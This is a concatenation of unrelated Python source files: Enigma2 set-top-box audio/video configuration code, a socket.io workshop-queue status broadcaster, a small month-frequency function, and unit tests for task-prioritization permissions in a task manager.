try:
can_downmix_aac = open("/proc/stb/audio/aac_choices", "r").read()[:-1].find("downmix") != -1
except:
can_downmix_aac = False
SystemInfo["CanDownmixAAC"] = can_downmix_aac
if can_downmix_aac:
def setAACDownmix(configElement):
open("/proc/stb/audio/aac", "w").write(configElement.value and "downmix" or "passthrough")
config.av.downmix_aac = ConfigYesNo(default = True)
config.av.downmix_aac.addNotifier(setAACDownmix)
try:
can_osd_alpha = open("/proc/stb/video/alpha", "r") and True or False
except:
can_osd_alpha = False
SystemInfo["CanChangeOsdAlpha"] = can_osd_alpha
def setAlpha(config):
open("/proc/stb/video/alpha", "w").write(str(config.value))
if can_osd_alpha:
config.av.osd_alpha = ConfigSlider(default=255, limits=(0,255))
config.av.osd_alpha.addNotifier(setAlpha)
if os_path.exists("/proc/stb/vmpeg/0/pep_scaler_sharpness"):
def setScaler_sharpness(config):
myval = int(config.value)
try:
print "--> setting scaler_sharpness to: %0.8X" % myval
open("/proc/stb/vmpeg/0/pep_scaler_sharpness", "w").write("%0.8X" % myval)
open("/proc/stb/vmpeg/0/pep_apply", "w").write("1")
except IOError:
print "couldn't write pep_scaler_sharpness"
config.av.scaler_sharpness = ConfigSlider(default=13, limits=(0,26))
config.av.scaler_sharpness.addNotifier(setScaler_sharpness)
else:
config.av.scaler_sharpness = NoSave(ConfigNothing())
|
ARL-UTEP-OC/emubox
|
workshop-manager/bin/RequestHandler/client_updater.py
|
import sys
import time
import logging
from socketio import socketio_manage
from socketio.mixins import BroadcastMixin
from socketio.namespace import BaseNamespace
from DataAggregation.webdata_aggregator import getAvailableWorkshops
logger = logging.getLogger(__name__)
std_out_logger = logging.StreamHandler(sys.stdout)
logger.addHandler(std_out_logger)
def broadcast_msg(server, ns_name, event, *args):
pkt = dict(type="event",
name=event,
args=args,
endpoint=ns_name)
for sessid, socket in server.sockets.iteritems():
socket.send_packet(pkt)
def workshops_monitor(server):
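# Poll the workshop queues once per second and broadcast an updated size whenever a queue's length changes.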
sizes = []
workshops = getAvailableWorkshops()
for w in workshops:
tmp = [w.workshopName, w.q.qsize()]
sizes.append(tmp)
broadcast_msg(server, '', "sizes", tmp)
while True:
logger.info("Participants viewing frontend:" + str(len(server.sockets)))
workshops_available = []
curr_workshops = getAvailableWorkshops()
for w in curr_workshops:
workshops_available.append([w.workshopName, w.q.qsize()])
wq = filter(lambda x: x[0] == w.workshopName, sizes)[0]
if wq[1] != w.q.qsize():
wq[1] = w.q.qsize()
logging.info("client_updater: New update being pushed to clients: " + str(wq))
broadcast_msg(server, '', 'sizes', wq)
logger.info("Workshops available:" + str(workshops_available))
time.sleep(1)
class RequestHandlerApp(object):
def __call__(self, environ, start_response):
if environ['PATH_INFO'].startswith('/socket.io'):
socketio_manage(environ, {'': QueueStatusHandler})
return []
start_response('404 Not Found', [('Content-Type', 'text/plain')])
return ['Not found']
class QueueStatusHandler(BaseNamespace, BroadcastMixin):
def on_connect(self):
sizes = []
workshops = getAvailableWorkshops()
for w in workshops:
tmp = [w.workshopName, w.q.qsize()]
sizes.append(tmp)
self.emit('sizes', tmp)
|
bluciam/ruby_versus_python
|
other/dicco_numbers.py
|
def freq_month(obj):
if obj is None or obj == []:
return
months = {1: 'jan',
2: 'feb',
3: 'mar',
4: 'apr',
5: 'may',
6: 'jun',
7: 'jul',
8: 'aug',
9: 'sep',
10: 'oct',
11: 'nov',
12: 'dec',
}
frequencies = [0] * 12
# for i in range(0, len(obj)):
# frequencies[ obj[i] -1] += 1
for i in obj:
frequencies[i - 1] += 1
print "The following month(s) have a birthday celebration"
for i in range(0, len(frequencies)):
if frequencies[i] > 0:
print str(months[i+1]) + " has " + str(frequencies[i])
return frequencies
in_array = [3, 6, 2, 7, 7, 7]
print freq_month(in_array)
print freq_month([])
|
izrik/tudor
|
tests/logic_t/layer/LogicLayer/test_task_prioritize.py
|
#!/usr/bin/env python
import unittest
from werkzeug.exceptions import NotFound, Forbidden
from tests.logic_t.layer.LogicLayer.util import generate_ll
class TaskPrioritizeBeforeLogicLayerTest(unittest.TestCase):
def setUp(self):
self.ll = generate_ll()
self.pl = self.ll.pl
def test_add_prioritize_before_adds_prioritize_before(self):
# given
t1 = self.pl.create_task('t1')
t2 = self.pl.create_task('t2')
user = self.pl.create_user('name@example.com')
t1.users.append(user)
t2.users.append(user)
self.pl.add(t1)
self.pl.add(t2)
self.pl.add(user)
self.pl.commit()
# precondition
self.assertEqual(0, len(t1.prioritize_after))
self.assertEqual(0, len(t1.prioritize_before))
self.assertEqual(0, len(t2.prioritize_after))
self.assertEqual(0, len(t2.prioritize_before))
# when
results = self.ll.do_add_prioritize_before_to_task(t1.id, t2.id, user)
# then
self.assertEqual(0, len(t1.prioritize_after))
self.assertEqual(1, len(t1.prioritize_before))
self.assertEqual(1, len(t2.prioritize_after))
self.assertEqual(0, len(t2.prioritize_before))
self.assertTrue(t2 in t1.prioritize_before)
self.assertTrue(t1 in t2.prioritize_after)
self.assertIsNotNone(results)
self.assertEqual([t1, t2], list(results))
def test_if_already_added_still_succeeds(self):
# given
t1 = self.pl.create_task('t1')
t2 = self.pl.create_task('t2')
t1.prioritize_before.append(t2)
user = self.pl.create_user('name@example.com')
t1.users.append(user)
t2.users.append(user)
self.pl.add(t1)
self.pl.add(t2)
self.pl.add(user)
self.pl.commit()
# precondition
self.assertEqual(0, len(t1.prioritize_after))
self.assertEqual(1, len(t1.prioritize_before))
self.assertEqual(1, len(t2.prioritize_after))
self.assertEqual(0, len(t2.prioritize_before))
self.assertTrue(t2 in t1.prioritize_before)
self.assertTrue(t1 in t2.prioritize_after)
# when
results = self.ll.do_add_prioritize_before_to_task(t1.id, t2.id, user)
# then
self.assertEqual(0, len(t1.prioritize_after))
self.assertEqual(1, len(t1.prioritize_before))
self.assertEqual(1, len(t2.prioritize_after))
self.assertEqual(0, len(t2.prioritize_before))
self.assertTrue(t2 in t1.prioritize_before)
self.assertTrue(t1 in t2.prioritize_after)
self.assertIsNotNone(results)
self.assertEqual([t1, t2], list(results))
def test_null_ids_raises_exception(self):
# given
t1 = self.pl.create_task('t1')
t2 = self.pl.create_task('t2')
user = self.pl.create_user('name@example.com')
t1.users.append(user)
t2.users.append(user)
self.pl.add(t1)
self.pl.add(t2)
self.pl.add(user)
self.pl.commit()
# precondition
self.assertEqual(0, len(t1.prioritize_after))
self.assertEqual(0, len(t1.prioritize_before))
self.assertEqual(0, len(t2.prioritize_after))
self.assertEqual(0, len(t2.prioritize_before))
# expect
self.assertRaises(ValueError, self.ll.do_add_prioritize_before_to_task,
None, t2.id, user)
# expect
self.assertRaises(ValueError, self.ll.do_add_prioritize_before_to_task,
t1.id, None, user)
# expect
self.assertRaises(ValueError, self.ll.do_add_prioritize_before_to_task,
None, None, user)
# then
self.assertEqual(0, len(t1.prioritize_after))
self.assertEqual(0, len(t1.prioritize_before))
self.assertEqual(0, len(t2.prioritize_after))
self.assertEqual(0, len(t2.prioritize_before))
def test_null_user_raises_exception(self):
# given
t1 = self.pl.create_task('t1')
t2 = self.pl.create_task('t2')
user = self.pl.create_user('name@example.com')
t1.users.append(user)
t2.users.append(user)
self.pl.add(t1)
self.pl.add(t2)
self.pl.add(user)
self.pl.commit()
# precondition
self.assertEqual(0, len(t1.prioritize_after))
self.assertEqual(0, len(t1.prioritize_before))
self.assertEqual(0, len(t2.prioritize_after))
self.assertEqual(0, len(t2.prioritize_before))
# expect
self.assertRaises(ValueError, self.ll.do_add_prioritize_before_to_task,
t1.id, t2.id, None)
# then
self.assertEqual(0, len(t1.prioritize_after))
self.assertEqual(0, len(t1.prioritize_before))
self.assertEqual(0, len(t2.prioritize_after))
self.assertEqual(0, len(t2.prioritize_before))
def test_user_not_authorized_for_task_raises_exception(self):
# given
t1 = self.pl.create_task('t1')
t2 = self.pl.create_task('t2')
user = self.pl.create_user('name@example.com')
t2.users.append(user)
self.pl.add(t1)
self.pl.add(t2)
self.pl.add(user)
self.pl.commit()
# precondition
self.assertEqual(0, len(t1.prioritize_after))
self.assertEqual(0, len(t1.prioritize_before))
self.assertEqual(0, len(t2.prioritize_after))
self.assertEqual(0, len(t2.prioritize_before))
# expect
self.assertRaises(Forbidden, self.ll.do_add_prioritize_before_to_task,
t1.id, t2.id, user)
# then
self.assertEqual(0, len(t1.prioritize_after))
self.assertEqual(0, len(t1.prioritize_before))
self.assertEqual(0, len(t2.prioritize_after))
self.assertEqual(0, len(t2.prioritize_before))
def test_user_not_authorized_for_prioritize_before_raises_exception(self):
# given
t1 = self.pl.create_task('t1')
t2 = self.pl.create_task('t2')
user = self.pl.create_user('name@example.com')
t1.users.append(user)
self.pl.add(t1)
self.pl.add(t2)
self.pl.add(user)
self.pl.commit()
# precondition
self.assertEqual(0, len(t1.prioritize_after))
self.assertEqual(0, len(t1.prioritize_before))
self.assertEqual(0, len(t2.prioritize_after))
self.assertEqual(0, len(t2.prioritize_before))
# expect
self.assertRaises(Forbidden, self.ll.do_add_prioritize_before_to_task,
t1.id, t2.id, user)
# then
self.assertEqual(0, len(t1.prioritize_after))
self.assertEqual(0, len(t1.prioritize_before))
self.assertEqual(0, len(t2.prioritize_after))
self.assertEqual(0, len(t2.prioritize_before))
def test_task_not_found_raises_exception(self):
# given
t2 = self.pl.create_task('t2')
user = self.pl.create_user('name@example.com')
t2.users.append(user)
self.pl.add(t2)
self.pl.add(user)
self.pl.commit()
# precondition
self.assertEqual(0, len(t2.prioritize_after))
self.assertEqual(0, len(t2.prioritize_before))
self.assertIsNone(self.pl.get_task(t2.id + 1))
# expect
self.assertRaises(NotFound, self.ll.do_add_prioritize_before_to_task,
t2.id + 1, t2.id, user)
# then
self.assertEqual(0, len(t2.prioritize_after))
self.assertEqual(0, len(t2.prioritize_before))
self.assertIsNone(self.pl.get_task(t2.id+1))
def test_prioritize_before_not_found_raises_exception(self):
# given
t1 = self.pl.create_task('t1')
user = self.pl.create_user('name@example.com')
t1.users.append(user)
self.pl.add(t1)
self.pl.add(user)
self.pl.commit()
# precondition
self.assertEqual(0, len(t1.prioritize_after))
self.assertEqual(0, len(t1.prioritize_before))
self.assertIsNone(self.pl.get_task(t1.id + 1))
# expect
self.assertRaises(NotFound, self.ll.do_add_prioritize_before_to_task,
t1.id, t1.id + 1, user)
# then
self.assertEqual(0, len(t1.prioritize_after))
self.assertEqual(0, len(t1.prioritize_before))
self.assertIsNone(self.pl.get_task(t1.id + 1))
def test_remove_prioritize_before_removes_prioritize_before(self):
# given
t1 = self.pl.create_task('t1')
t2 = self.pl.create_task('t2')
user = self.pl.create_user('name@example.com')
t1.users.append(user)
t2.users.append(user)
t1.prioritize_before.append(t2)
self.pl.add(t1)
self.pl.add(t2)
self.pl.add(user)
self.pl.commit()
# precondition
self.assertEqual(0, len(t1.prioritize_after))
self.assertEqual(1, len(t1.prioritize_before))
self.assertEqual(1, len(t2.prioritize_after))
self.assertEqual(0, len(t2.prioritize_before))
self.assertTrue(t2 in t1.prioritize_before)
self.assertTrue(t1 in t2.prioritize_after)
# when
results = self.ll.do_remove_prioritize_before_from_task(t1.id, t2.id,
user)
# then
self.assertEqual(0, len(t1.prioritize_after))
self.assertEqual(0, len(t1.prioritize_before))
self.assertEqual(0, len(t2.prioritize_after))
self.assertEqual(0, len(t2.prioritize_before))
self.assertIsNotNone(results)
self.assertEqual([t1, t2], list(results))
def test_if_prioritize_before_already_removed_still_succeeds(self):
# given
t1 = self.pl.create_task('t1')
t2 = self.pl.create_task('t2')
user = self.pl.create_user('name@example.com')
t1.users.append(user)
t2.users.append(user)
self.pl.add(t1)
self.pl.add(t2)
self.pl.add(user)
self.pl.commit()
# precondition
self.assertEqual(0, len(t1.prioritize_after))
self.assertEqual(0, len(t1.prioritize_before))
self.assertEqual(0, len(t2.prioritize_after))
self.assertEqual(0, len(t2.prioritize_before))
# when
results = self.ll.do_remove_prioritize_before_from_task(t1.id, t2.id,
user)
# then
self.assertEqual(0, len(t1.prioritize_after))
self.assertEqual(0, len(t1.prioritize_before))
self.assertEqual(0, len(t2.prioritize_after))
self.assertEqual(0, len(t2.prioritize_before))
self.assertIsNotNone(results)
self.assertEqual([t1, t2], list(results))
def test_remove_prioritize_before_with_null_ids_raises_exception(self):
# given
t1 = self.pl.create_task('t1')
t2 = self.pl.create_task('t2')
user = self.pl.create_user('name@example.com')
t1.users.append(user)
t2.users.append(user)
t1.prioritize_before.append(t2)
self.pl.add(t1)
self.pl.add(t2)
self.pl.add(user)
self.pl.commit()
# precondition
self.assertEqual(0, len(t1.prioritize_after))
self.assertEqual(1, len(t1.prioritize_before))
self.assertEqual(1, len(t2.prioritize_after))
self.assertEqual(0, len(t2.prioritize_before))
self.assertTrue(t2 in t1.prioritize_before)
self.assertTrue(t1 in t2.prioritize_after)
# expect
self.assertRaises(ValueError,
self.ll.do_remove_prioritize_before_from_task,
None, t2.id, user)
# expect
self.assertRaises(ValueError,
self.ll.do_remove_prioritize_before_from_task,
t1.id, None, user)
# expect
self.assertRaises(ValueError,
self.ll.do_remove_prioritize_before_from_task,
None, None, user)
# then
self.assertEqual(0, len(t1.prioritize_after))
self.assertEqual(1, len(t1.prioritize_before))
self.assertEqual(1, len(t2.prioritize_after))
self.assertEqual(0, len(t2.prioritize_before))
self.assertTrue(t2 in t1.prioritize_before)
self.assertTrue(t1 in t2.prioritize_after)
def test_remove_prioritize_before_with_null_user_raises_exception(self):
# given
t1 = self.pl.create_task('t1')
t2 = self.pl.create_task('t2')
user = self.pl.create_user('name@example.com')
t1.users.append(user)
t2.users.append(user)
t1.prioritize_before.append(t2)
self.pl.add(t1)
self.pl.add(t2)
self.pl.add(user)
self.pl.commit()
# precondition
self.assertEqual(0, len(t1.prioritize_after))
self.assertEqual(1, len(t1.prioritize_before))
self.assertEqual(1, len(t2.prioritize_after))
self.assertEqual(0, len(t2.prioritize_before))
self.assertTrue(t2 in t1.prioritize_before)
self.assertTrue(t1 in t2.prioritize_after)
# expect
self.assertRaises(ValueError,
self.ll.do_remove_prioritize_before_from_task,
t1.id, t2.id, None)
# then
self.assertEqual(0, len(t1.prioritize_after))
self.assertEqual(1, len(t1.prioritize_before))
self.assertEqual(1, len(t2.prioritize_after))
self.assertEqual(0, len(t2.prioritize_before))
self.assertTrue(t2 in t1.prioritize_before)
self.assertTrue(t1 in t2.prioritize_after)
def test_remove_prioritize_before_user_unauthd_raises_exception(self):
# given
t1 = self.pl.create_task('t1')
t2 = self.pl.create_task('t2')
user = self.pl.create_user('name@example.com')
t2.users.append(user)
t1.prioritize_before.append(t2)
self.pl.add(t1)
self.pl.add(t2)
self.pl.add(user)
self.pl.commit()
# Note that this situation shouldn't happen anyway: a task shouldn't
# be prioritized before another task unless both share a common set of
# one or more authorized users.
# precondition
self.assertEqual(0, len(t1.prioritize_after))
self.assertEqual(1, len(t1.prioritize_before))
self.assertEqual(1, len(t2.prioritize_after))
self.assertEqual(0, len(t2.prioritize_before))
self.assertTrue(t2 in t1.prioritize_before)
self.assertTrue(t1 in t2.prioritize_after)
# expect
self.assertRaises(Forbidden,
self.ll.do_remove_prioritize_before_from_task,
t1.id, t2.id, user)
# then
self.assertEqual(0, len(t1.prioritize_after))
self.assertEqual(1, len(t1.prioritize_before))
self.assertEqual(1, len(t2.prioritize_after))
self.assertEqual(0, len(t2.prioritize_before))
self.assertTrue(t2 in t1.prioritize_before)
self.assertTrue(t1 in t2.prioritize_after)
def test_remove_user_not_authd_for_prioritizebefore_raises_exception(self):
# given
t1 = self.pl.create_task('t1')
t2 = self.pl.create_task('t2')
user = self.pl.create_user('name@example.com')
t1.users.append(user)
t1.prioritize_before.append(t2)
self.pl.add(t1)
self.pl.add(t2)
self.pl.add(user)
self.pl.commit()
# Note that this situation shouldn't happen anyway: a task shouldn't
# be prioritized before another task unless both share a common set of
# one or more authorized users.
# precondition
self.assertEqual(0, len(t1.prioritize_after))
self.assertEqual(1, len(t1.prioritize_before))
self.assertEqual(1, len(t2.prioritize_after))
self.assertEqual(0, len(t2.prioritize_before))
self.assertTrue(t2 in t1.prioritize_before)
self.assertTrue(t1 in t2.prioritize_after)
# expect
self.assertRaises(Forbidden,
self.ll.do_remove_prioritize_before_from_task,
t1.id, t2.id, user)
# then
self.assertEqual(0, len(t1.prioritize_after))
self.assertEqual(1, len(t1.prioritize_before))
self.assertEqual(1, len(t2.prioritize_after))
self.assertEqual(0, len(t2.prioritize_before))
self.assertTrue(t2 in t1.prioritize_before)
self.assertTrue(t1 in t2.prioritize_after)
def test_remove_prioritize_before_task_not_found_raises_exception(self):
# given
t2 = self.pl.create_task('t2')
user = self.pl.create_user('name@example.com')
t2.users.append(user)
self.pl.add(t2)
self.pl.add(user)
self.pl.commit()
# precondition
self.assertEqual(0, len(t2.prioritize_after))
self.assertEqual(0, len(t2.prioritize_before))
self.assertIsNone(self.pl.get_task(t2.id + 1))
# expect
self.assertRaises(NotFound,
self.ll.do_remove_prioritize_before_from_task,
t2.id + 1, t2.id, user)
# then
self.assertEqual(0, len(t2.prioritize_after))
self.assertEqual(0, len(t2.prioritize_before))
self.assertIsNone(self.pl.get_task(t2.id+1))
def test_remove_prioritize_before_when_not_found_raises_exception(self):
# given
t1 = self.pl.create_task('t1')
user = self.pl.create_user('name@example.com')
t1.users.append(user)
self.pl.add(t1)
self.pl.add(user)
self.pl.commit()
# precondition
self.assertEqual(0, len(t1.prioritize_after))
self.assertEqual(0, len(t1.prioritize_before))
self.assertIsNone(self.pl.get_task(t1.id + 1))
# expect
self.assertRaises(NotFound,
self.ll.do_remove_prioritize_before_from_task,
t1.id, t1.id + 1, user)
# then
self.assertEqual(0, len(t1.prioritize_after))
self.assertEqual(0, len(t1.prioritize_before))
self.assertIsNone(self.pl.get_task(t1.id + 1))
class TaskPrioritizeAfterLogicLayerTest(unittest.TestCase):
def setUp(self):
self.ll = generate_ll()
self.pl = self.ll.pl
def test_add_prioritize_after_adds_prioritize_after(self):
# given
t1 = self.pl.create_task('t1')
t2 = self.pl.create_task('t2')
user = self.pl.create_user('name@example.com')
t1.users.append(user)
t2.users.append(user)
self.pl.add(t1)
self.pl.add(t2)
self.pl.add(user)
self.pl.commit()
# precondition
self.assertEqual(0, len(t1.prioritize_before))
self.assertEqual(0, len(t1.prioritize_after))
self.assertEqual(0, len(t2.prioritize_before))
self.assertEqual(0, len(t2.prioritize_after))
# when
results = self.ll.do_add_prioritize_after_to_task(t1.id, t2.id, user)
# then
self.assertEqual(0, len(t1.prioritize_before))
self.assertEqual(1, len(t1.prioritize_after))
self.assertEqual(1, len(t2.prioritize_before))
self.assertEqual(0, len(t2.prioritize_after))
self.assertTrue(t2 in t1.prioritize_after)
self.assertTrue(t1 in t2.prioritize_before)
self.assertIsNotNone(results)
self.assertEqual([t1, t2], list(results))
def test_if_already_added_still_succeeds(self):
# given
t1 = self.pl.create_task('t1')
t2 = self.pl.create_task('t2')
t1.prioritize_after.append(t2)
user = self.pl.create_user('name@example.com')
t1.users.append(user)
t2.users.append(user)
self.pl.add(t1)
self.pl.add(t2)
self.pl.add(user)
self.pl.commit()
# precondition
self.assertEqual(0, len(t1.prioritize_before))
self.assertEqual(1, len(t1.prioritize_after))
self.assertEqual(1, len(t2.prioritize_before))
self.assertEqual(0, len(t2.prioritize_after))
self.assertTrue(t2 in t1.prioritize_after)
self.assertTrue(t1 in t2.prioritize_before)
# when
results = self.ll.do_add_prioritize_after_to_task(t1.id, t2.id, user)
# then
self.assertEqual(0, len(t1.prioritize_before))
self.assertEqual(1, len(t1.prioritize_after))
self.assertEqual(1, len(t2.prioritize_before))
self.assertEqual(0, len(t2.prioritize_after))
self.assertTrue(t2 in t1.prioritize_after)
self.assertTrue(t1 in t2.prioritize_before)
self.assertIsNotNone(results)
self.assertEqual([t1, t2], list(results))
def test_null_ids_raises_exception(self):
# given
t1 = self.pl.create_task('t1')
t2 = self.pl.create_task('t2')
user = self.pl.create_user('name@example.com')
t1.users.append(user)
t2.users.append(user)
self.pl.add(t1)
self.pl.add(t2)
self.pl.add(user)
self.pl.commit()
# precondition
self.assertEqual(0, len(t1.prioritize_before))
self.assertEqual(0, len(t1.prioritize_after))
self.assertEqual(0, len(t2.prioritize_before))
self.assertEqual(0, len(t2.prioritize_after))
# expect
self.assertRaises(ValueError, self.ll.do_add_prioritize_after_to_task,
None, t2.id, user)
# expect
self.assertRaises(ValueError, self.ll.do_add_prioritize_after_to_task,
t1.id, None, user)
# expect
self.assertRaises(ValueError, self.ll.do_add_prioritize_after_to_task,
None, None, user)
# then
self.assertEqual(0, len(t1.prioritize_before))
self.assertEqual(0, len(t1.prioritize_after))
self.assertEqual(0, len(t2.prioritize_before))
self.assertEqual(0, len(t2.prioritize_after))
def test_null_user_raises_exception(self):
# given
t1 = self.pl.create_task('t1')
t2 = self.pl.create_task('t2')
user = self.pl.create_user('name@example.com')
t1.users.append(user)
t2.users.append(user)
self.pl.add(t1)
self.pl.add(t2)
self.pl.add(user)
self.pl.commit()
# precondition
self.assertEqual(0, len(t1.prioritize_before))
self.assertEqual(0, len(t1.prioritize_after))
self.assertEqual(0, len(t2.prioritize_before))
self.assertEqual(0, len(t2.prioritize_after))
# expect
self.assertRaises(ValueError, self.ll.do_add_prioritize_after_to_task,
t1.id, t2.id, None)
# then
self.assertEqual(0, len(t1.prioritize_before))
self.assertEqual(0, len(t1.prioritize_after))
self.assertEqual(0, len(t2.prioritize_before))
self.assertEqual(0, len(t2.prioritize_after))
def test_user_not_authorized_for_task_raises_exception(self):
# given
t1 = self.pl.create_task('t1')
t2 = self.pl.create_task('t2')
user = self.pl.create_user('name@example.com')
t2.users.append(user)
self.pl.add(t1)
self.pl.add(t2)
self.pl.add(user)
self.pl.commit()
# precondition
self.assertEqual(0, len(t1.prioritize_before))
self.assertEqual(0, len(t1.prioritize_after))
self.assertEqual(0, len(t2.prioritize_before))
self.assertEqual(0, len(t2.prioritize_after))
# expect
self.assertRaises(Forbidden, self.ll.do_add_prioritize_after_to_task,
t1.id, t2.id, user)
# then
self.assertEqual(0, len(t1.prioritize_before))
self.assertEqual(0, len(t1.prioritize_after))
self.assertEqual(0, len(t2.prioritize_before))
self.assertEqual(0, len(t2.prioritize_after))
def test_user_not_authorized_for_prioritize_after_raises_exception(self):
# given
t1 = self.pl.create_task('t1')
t2 = self.pl.create_task('t2')
user = self.pl.create_user('name@example.com')
t1.users.append(user)
self.pl.add(t1)
self.pl.add(t2)
self.pl.add(user)
self.pl.commit()
# precondition
self.assertEqual(0, len(t1.prioritize_before))
self.assertEqual(0, len(t1.prioritize_after))
self.assertEqual(0, len(t2.prioritize_before))
self.assertEqual(0, len(t2.prioritize_after))
# expect
self.assertRaises(Forbidden, self.ll.do_add_prioritize_after_to_task,
t1.id, t2.id, user)
# then
self.assertEqual(0, len(t1.prioritize_before))
self.assertEqual(0, len(t1.prioritize_after))
self.assertEqual(0, len(t2.prioritize_before))
self.assertEqual(0, len(t2.prioritize_after))
def test_task_not_found_raises_exception(self):
# given
t2 = self.pl.create_task('t2')
user = self.pl.create_user('name@example.com')
t2.users.append(user)
self.pl.add(t2)
self.pl.add(user)
self.pl.commit()
# precondition
self.assertEqual(0, len(t2.prioritize_before))
self.assertEqual(0, len(t2.prioritize_after))
self.assertIsNone(self.pl.get_task(t2.id + 1))
# expect
self.assertRaises(NotFound, self.ll.do_add_prioritize_after_to_task,
t2.id + 1, t2.id, user)
# then
self.assertEqual(0, len(t2.prioritize_before))
self.assertEqual(0, len(t2.prioritize_after))
self.assertIsNone(self.pl.get_task(t2.id+1))
def test_prioritize_after_not_found_raises_exception(self):
# given
t1 = self.pl.create_task('t1')
user = self.pl.create_user('name@example.com')
t1.users.append(user)
self.pl.add(t1)
self.pl.add(user)
self.pl.commit()
# precondition
self.assertEqual(0, len(t1.prioritize_before))
self.assertEqual(0, len(t1.prioritize_after))
self.assertIsNone(self.pl.get_task(t1.id + 1))
# expect
self.assertRaises(NotFound, self.ll.do_add_prioritize_after_to_task,
t1.id, t1.id + 1, user)
# then
self.assertEqual(0, len(t1.prioritize_before))
self.assertEqual(0, len(t1.prioritize_after))
self.assertIsNone(self.pl.get_task(t1.id + 1))
def test_remove_prioritize_after_removes_prioritize_after(self):
# given
t1 = self.pl.create_task('t1')
t2 = self.pl.create_task('t2')
user = self.pl.create_user('name@example.com')
t1.users.append(user)
t2.users.append(user)
t1.prioritize_after.append(t2)
self.pl.add(t1)
self.pl.add(t2)
self.pl.add(user)
self.pl.commit()
# precondition
self.assertEqual(0, len(t1.prioritize_before))
self.assertEqual(1, len(t1.prioritize_after))
self.assertEqual(1, len(t2.prioritize_before))
self.assertEqual(0, len(t2.prioritize_after))
self.assertTrue(t2 in t1.prioritize_after)
self.assertTrue(t1 in t2.prioritize_before)
# when
results = self.ll.do_remove_prioritize_after_from_task(t1.id, t2.id,
user)
# then
self.assertEqual(0, len(t1.prioritize_before))
self.assertEqual(0, len(t1.prioritize_after))
self.assertEqual(0, len(t2.prioritize_before))
self.assertEqual(0, len(t2.prioritize_after))
self.assertIsNotNone(results)
self.assertEqual([t1, t2], list(results))
def test_if_prioritize_after_already_removed_still_succeeds(self):
# given
t1 = self.pl.create_task('t1')
t2 = self.pl.create_task('t2')
user = self.pl.create_user('name@example.com')
t1.users.append(user)
t2.users.append(user)
self.pl.add(t1)
self.pl.add(t2)
self.pl.add(user)
self.pl.commit()
# precondition
self.assertEqual(0, len(t1.prioritize_before))
self.assertEqual(0, len(t1.prioritize_after))
self.assertEqual(0, len(t2.prioritize_before))
self.assertEqual(0, len(t2.prioritize_after))
# when
results = self.ll.do_remove_prioritize_after_from_task(t1.id, t2.id,
user)
# then
self.assertEqual(0, len(t1.prioritize_before))
self.assertEqual(0, len(t1.prioritize_after))
self.assertEqual(0, len(t2.prioritize_before))
self.assertEqual(0, len(t2.prioritize_after))
self.assertIsNotNone(results)
self.assertEqual([t1, t2], list(results))
def test_remove_prioritize_after_with_null_ids_raises_exception(self):
# given
t1 = self.pl.create_task('t1')
t2 = self.pl.create_task('t2')
user = self.pl.create_user('name@example.com')
t1.users.append(user)
t2.users.append(user)
t1.prioritize_after.append(t2)
self.pl.add(t1)
self.pl.add(t2)
self.pl.add(user)
self.pl.commit()
# precondition
self.assertEqual(0, len(t1.prioritize_before))
self.assertEqual(1, len(t1.prioritize_after))
self.assertEqual(1, len(t2.prioritize_before))
self.assertEqual(0, len(t2.prioritize_after))
self.assertTrue(t2 in t1.prioritize_after)
self.assertTrue(t1 in t2.prioritize_before)
# expect
self.assertRaises(ValueError,
self.ll.do_remove_prioritize_after_from_task,
None, t2.id, user)
# expect
self.assertRaises(ValueError,
self.ll.do_remove_prioritize_after_from_task,
t1.id, None, user)
# expect
self.assertRaises(ValueError,
self.ll.do_remove_prioritize_after_from_task,
None, None, user)
# then
self.assertEqual(0, len(t1.prioritize_before))
self.assertEqual(1, len(t1.prioritize_after))
self.assertEqual(1, len(t2.prioritize_before))
self.assertEqual(0, len(t2.prioritize_after))
self.assertTrue(t2 in t1.prioritize_after)
self.assertTrue(t1 in t2.prioritize_before)
def test_remove_prioritize_after_with_null_user_raises_exception(self):
# given
t1 = self.pl.create_task('t1')
t2 = self.pl.create_task('t2')
user = self.pl.create_user('name@example.com')
t1.users.append(user)
t2.users.append(user)
t1.prioritize_after.append(t2)
self.pl.add(t1)
self.pl.add(t2)
self.pl.add(user)
self.pl.commit()
# precondition
self.assertEqual(0, len(t1.prioritize_before))
self.assertEqual(1, len(t1.prioritize_after))
self.assertEqual(1, len(t2.prioritize_before))
self.assertEqual(0, len(t2.prioritize_after))
self.assertTrue(t2 in t1.prioritize_after)
self.assertTrue(t1 in t2.prioritize_before)
# expect
self.assertRaises(ValueError,
self.ll.do_remove_prioritize_after_from_task,
t1.id, t2.id, None)
# then
self.assertEqual(0, len(t1.prioritize_before))
self.assertEqual(1, len(t1.prioritize_after))
self.assertEqual(1, len(t2.prioritize_before))
self.assertEqual(0, len(t2.prioritize_after))
self.assertTrue(t2 in t1.prioritize_after)
self.assertTrue(t1 in t2.prioritize_before)
def test_rem_prioritize_after_user_unauthd_for_task_raises_exception(self):
# given
t1 = self.pl.create_task('t1')
t2 = self.pl.create_task('t2')
user = self.pl.create_user('name@example.com')
t2.users.append(user)
t1.prioritize_after.append(t2)
self.pl.add(t1)
self.pl.add(t2)
self.pl.add(user)
self.pl.commit()
# Note that this situation shouldn't happen anyway: a task shouldn't
# be prioritized before another task unless both share a common set of
# one or more authorized users.
# precondition
self.assertEqual(0, len(t1.prioritize_before))
self.assertEqual(1, len(t1.prioritize_after))
self.assertEqual(1, len(t2.prioritize_before))
self.assertEqual(0, len(t2.prioritize_after))
self.assertTrue(t2 in t1.prioritize_after)
self.assertTrue(t1 in t2.prioritize_before)
# expect
self.assertRaises(Forbidden,
self.ll.do_remove_prioritize_after_from_task,
t1.id, t2.id, user)
# then
self.assertEqual(0, len(t1.prioritize_before))
self.assertEqual(1, len(t1.prioritize_after))
self.assertEqual(1, len(t2.prioritize_before))
self.assertEqual(0, len(t2.prioritize_after))
self.assertTrue(t2 in t1.prioritize_after)
self.assertTrue(t1 in t2.prioritize_before)
def test_remove_user_not_authd_for_prioritize_after_raises_exception(self):
# given
t1 = self.pl.create_task('t1')
t2 = self.pl.create_task('t2')
user = self.pl.create_user('name@example.com')
t1.users.append(user)
t1.prioritize_after.append(t2)
self.pl.add(t1)
self.pl.add(t2)
self.pl.add(user)
self.pl.commit()
# Note that this situation shouldn't happen anyway: a task shouldn't
# be prioritized before another task unless both share a common set of
# one or more authorized users.
# precondition
self.assertEqual(0, len(t1.prioritize_before))
self.assertEqual(1, len(t1.prioritize_after))
self.assertEqual(1, len(t2.prioritize_before))
self.assertEqual(0, len(t2.prioritize_after))
self.assertTrue(t2 in t1.prioritize_after)
